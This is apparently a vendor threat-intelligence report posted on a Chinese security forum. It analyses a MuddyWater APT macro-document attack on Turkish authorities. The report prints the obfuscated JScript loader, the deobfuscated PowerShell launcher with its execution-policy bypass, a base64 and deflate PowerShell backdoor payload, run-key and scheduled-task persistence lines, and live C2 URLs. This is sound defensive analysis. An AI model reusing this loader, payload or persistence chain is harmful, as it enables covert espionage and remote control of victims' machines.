查看: 2345|回复: 0
收起左侧

[技术原创] MuddyWater(污水)APT组织针对土耳其相关部门的定向攻击

[复制链接]
腾讯电脑管家
发表于 2018-7-23 16:27:16 | 显示全部楼层 |阅读模式
0x1 概况
        近日腾讯见威胁情报心再次捕获MuddyWater(污水) APT组织的一攻击样本,与20183捕获样本相比,本次攻击的的目标依然是土耳其。本次攻击时依然使用了宏文档进行载荷投递,宏文档中嵌入图标文件,图标中的关键字为“mersin emniyet müdürlüğü”,通过搜索引擎查询发现图标为土耳其相关部门的图标,推测此次能是一针对土耳其相关部门的定向攻击。
攻击技术方面该组织全程使用的是经过多次高度混淆的powershell脚本上次相比一些关键的木马功能变为了通过云控下powershell脚本来触发这样极大地增加了安全机构的取证难度。在c2方面,不上次样奢侈地使用了517c2地址,本次只使用了3面将对此次的攻击样本进行一次详细的分析。
攻击流程图
总结一下本次MuddyWater APT组织新样本的技术特点:
i. 攻击对象:土耳其相关部门,目的是接受云端控制,下载和释放后门,获取敏感信息;
ii. 使用多次高度混淆的PowerShell脚本;
iii. 一些关键的功能通过云控下发PowerShell脚本触发,行动极为隐蔽,难以捕捉;
iv. 本次捕获的样本只使用了3C2地址;
v. 脚本运行后,会设置开机自启动、解密c2、创建任务计划、获取计算机信息等,然后不断地访问c2,等待和执行新指令。
0x2 载荷投递
        宏文档中背景故意做得比较模糊,但土耳其启用宏的提示文字却异常鲜艳,这是种典型的社会工程学式的攻击方式,目的是为了让害者在好奇心的驱使下点击启动内容”按钮从而让在文档中的木马运行起来。
        该诱饵文档vba脚本带有密码保护查看宏时会弹出输入密码的提示框,破解后我们拿到了高度混淆的vba脚本
(vba脚本)
vba中4base64编码字符,经过解密后发现与释放在C:\ProgramData目录下的OneDrive.dll、OnDrive.htmlOneDrive.ini中的内容一致。
(vba释放出来的文件)
vba中的4base64编码如下所示
1base64)
2base64)
3base64
4base64
0x3 RAT分析OneDrive.html分析
文件中的内容如下,看下去所文的命令“c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\OneDrive.html,OneDrive,1,”类似,都是为了实现常驻功能的。
(OneDrive.html中的内容)
OneDrive.dll分析
此dll内容js脚本,内容如下所示。
<?xml version="1.0" encoding="utf-8"?>
<package>
  <component>
    <registration progid="y">
      <script language="JScript"><![CDATA[
var a=['wq3DhcOQw6A=','wr7CkMO7w5kVDUtTwr3DmwPCmQMcKC7CvcO/w6M0FmPCvcKtOMO8w4DCo8ONwp4Hw6RfFsOWPVJFw7EIwpA1B8Oxaglww4fDkmsEwphhSGNXNsOBw55owpFKwqfCuMK8wq8cwp7CnT/CghYBW8Kmw64DRWfCrcOcFSkVYMKYTFTDsT8aWUMlHXTCjMO4OhvDs0rCt0M1w7NIwrJMIBRMNmHDkwPDr8Otwo50w6tEBcKWwqNbwpIvSsOLwrpsw6tXfTLDgMO+wqPDiE0uwqlCIAHDlsOcP8O2woRrw7jCgsOnw5dnR8KAwpfDvQDCtcOaw6dbTnHDpcO1AcKXw6rCr07DmMOBDDtPwqpRBzHCqAUwWsOWw5gVMMK4QSleZHw8w7bDnMKjwoRRKExNZ8OhwqvDkMOVXcOYLcOkw4LDg8KLwqbDvzbDuAHCrA4Pw5lSKcK6ZRNrfHpGwr3DuhPDky07BMKRw41mwo9hw4PDn8KqAMOZIMOTZSUUw6JUwo7CgMOmwohqw7PDpsKeZwhywp7DoxQeXzN0wrXDnw8gw4MseTDCuHFTQzJYPEbCmMOMOjZGKsKaMlbCvcOlworCix/DkX3CpMKKNMKkw4PCpMK2wojCmw==','w53DoMKQIgTCqj7Cg8Oh','wrTDm3Q=','w6luw4jDkSXCksOnw4TDuW1bw4BVIsO2w6zChQrClnE=','X8K0NsO9woVWdDPDpQIqw7hUZg==','wpjCk0MpPsOWw73DmDVD','w7MnTlPCqcKYd8O1Bg==','w7zCrsOR','KXrDkcKffQZwdkl1eBx2','wqbCh8OIwofCtCU='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1c4));var b=function(c,d){c=c-0x0;var e=a[c];if(b['mtNPvA']===undefined){(function(){var f;try{var g=Function('return (function() '+'{}.constructor("return this")( )'+');');f=g();}catch(h){f=window;}var i='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';f['atob']||(f['atob']=function(j){var k=String(j)['replace'](/=+$/,'');for(var l=0x0,m,n,o=0x0,p='';n=k['charAt'](o++);~n&&(m=l%0x4?m*0x40+n:n,l++%0x4)?p+=String['fromCharCode'](0xff&m>>(-0x2*l&0x6)):0x0){n=i['indexOf'](n);}return p;});}());var q=function(r,s){var t=[],u=0x0,v,w='',x='';r=atob(r);for(var y=0x0,z=r['length'];y<z;y++){x+='%'+('00'+r['charCodeAt'](y)['toString'](0x10))['slice'](-0x2);}r=decodeURIComponent(x);for(var A=0x0;A<0x100;A++){t[A]=A;}for(A=0x0;A<0x100;A++){u=(u+t[A]+s['charCodeAt'](A%s['length']))%0x100;v=t[A];t[A]=t;t=v;}A=0x0;u=0x0;for(var B=0x0;B<r['length'];B++){A=(A+0x1)%0x100;u=(u+t[A])%0x100;v=t[A];t[A]=t;t=v;w+=String['fromCharCode'](r['charCodeAt'](B)^t[(t[A]+t)%0x100]);}return w;};b['yrYnwx']=q;b['VjLgMC']={};b['mtNPvA']=!![];}var C=b['VjLgMC'][c];if(C===undefined){if(b['LYvtJw']===undefined){b['LYvtJw']=!![];}e=b['yrYnwx'](e,d);b['VjLgMC'][c]=e;}else{e=C;}return e;};var cm=b('0x0','1(n^');var w32ps=GetObject(b('0x1','@#1j'))[b('0x2','rZ%W')](b('0x3','CaVK'));w32ps[b('0x4','nOAS')]();w32ps[b('0x5','2*bW')]=0x0;var rtrnCode=GetObject(b('0x6','mISm'))[b('0x7','5Kh]')](b('0x8','q!&J'))[b('0x9','r@qO')](cm,b('0xa','1(n^'),w32ps,null);
          ]]></script>
    </registration>
  </component>
</package>
OneDrve.dll中的代码精简后变成如下所示,作用是利用powershell执行OneDrive.ini中加密代码
var cm='powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\OneDrive.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));'
                    var w32ps = GetObject('winmgmts:')['Get']('Win32_ProcessStartup');
                                        w32ps['SpawnInstance_']();
                                        w32ps['ShowWindow'] = 0x0;
                    var rtrnCode = GetObject('winmgmts:')['Get']()['Win32_Process'](cm,'c:\\' , w32ps, null);
OneDrive.ini分析
OneDrive.ini中内容解密出来后如下所示,一段powershell脚本。
iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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
l/311/+Bw==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
onedrive.ini中powershell脚本先解压一段base64编码的脚本,然后再执行此脚本,解压后的powershell脚本如下(代码太长,截取了部分)经过了几层的高度混淆。
OneDriver.ini中powershell脚本经次去混淆后,最终会得到powershell版的后门木马。
OneDriver.最终的后门脚本)
后门木马功能分析
脚本运行后,会设置机自启动解密c2、创建任务计划获取计算机信息,然后不断访问c2,等待和执行指令。inipowershell脚本经次去混淆后,最终会得到powershell的后门木马。
脚本入口
(禁office安全项)
自启动及任务计划)
获取得计算机信息)
将计算机信息的md5值key)
解密c2)
http post
post的内容
(请求服务器下发指令)
由于服务器返回的数据异常,续只能通过阅读源码的方式分析部分功能。
服务器返回的异常数据)
命令字:upload的功能其实是为了下载文件
命令字:cmd,主要是执行cmd命令
命令字:b64,其实是为了执行base64编码powershell 脚本
命令字:muddy 主要功能是先把powershell脚本下载存储到c:\programdata\LSASS 文件中,再执行文件中的脚本

下文图中的base64解码后为“-exec Bypass -c $s=(get-content c:\programdata\LSASS);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));”
0x4 总结
        MuddyWater组织近段时间的攻击活动来看组织一直喜欢用宏文档加powershell脚本攻击手法次的攻击样本来看,该组织依然大量的攻陷网站,来进行诱饵的投递及胜利果实的回收,同时将真正核心的代码功能以云控的方式进行下发,便掩盖其攻击目的。因此,我们提醒政府、企业等广大用户,切勿随意打开来历不明的文档,同时安装安全软件。对安全软件提醒发现陌生程序创建开机启动项,务必高度重视。
目前,腾讯御界高级威胁检测系统已经可以检测并阻断该轮攻击的连接行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。
凭借基于行为的防护和智能模型两大核心能力,御界高级威胁检测系统可高效检测未知威胁,并通过对企业内外网边界处网络流量的分析,感知漏洞的利用和攻击。通过部署御界高级威胁检测系统,及时感知恶意流量,检测钓鱼网址和远控服务器地址在企业网络中的访问情况,保护企业网络安全。
0x5 IOCs
Md5:
5a42a712e3b3cfa1db32d9e3d832f8f1(doc)
6f1e84905f8d15269892026c0ab8d9a7(OneDrive.dll)
5a5b32e1ea053d5f76065cabe7e46851(OneDrive.html)
b96a0a71566a766589ba3c891f86ca3f(OneDrive.ini)
C2:
http://ektamservis.com/includes/main.php
http://www.cankayasrc.com/style/js/main.php
机自动项及任务计划
HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run :OneDrives(开机自启动
HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run: OneDrives(开机自启动)
“c:\\windows\\system32\\rundll32.exe advpack.dll,LaunchINFSection C:\\ProgramData\\OneDrive.html,OneDrive,1” 机自启动内容
MicrosoftOneDrive(任务计划
“c:\\windows\\system32\\rundll32.exe advpack.dll,LaunchINFSection C:\\ProgramData\\OneDrive.html,Defender,1,”(任务计划内容)
MuddyWater(污水)APT组织以从事网络间谍活动为目的,受害者主要分布在巴基斯坦、沙特阿拉伯、阿联酋、伊拉克、土耳其等中东地区国家。
MuddyWater(污水)APT组织自201711月被曝光以来,擅长利用Powershell脚本作为后门程序频繁发起网络攻击,主要攻击目标集中在政府、金融、能源、电信等要害部门。
相关阅读:《近期“污水”(MuddyWaterAPT组织攻击活动汇总》

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-22 12:13 , Processed in 0.124392 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表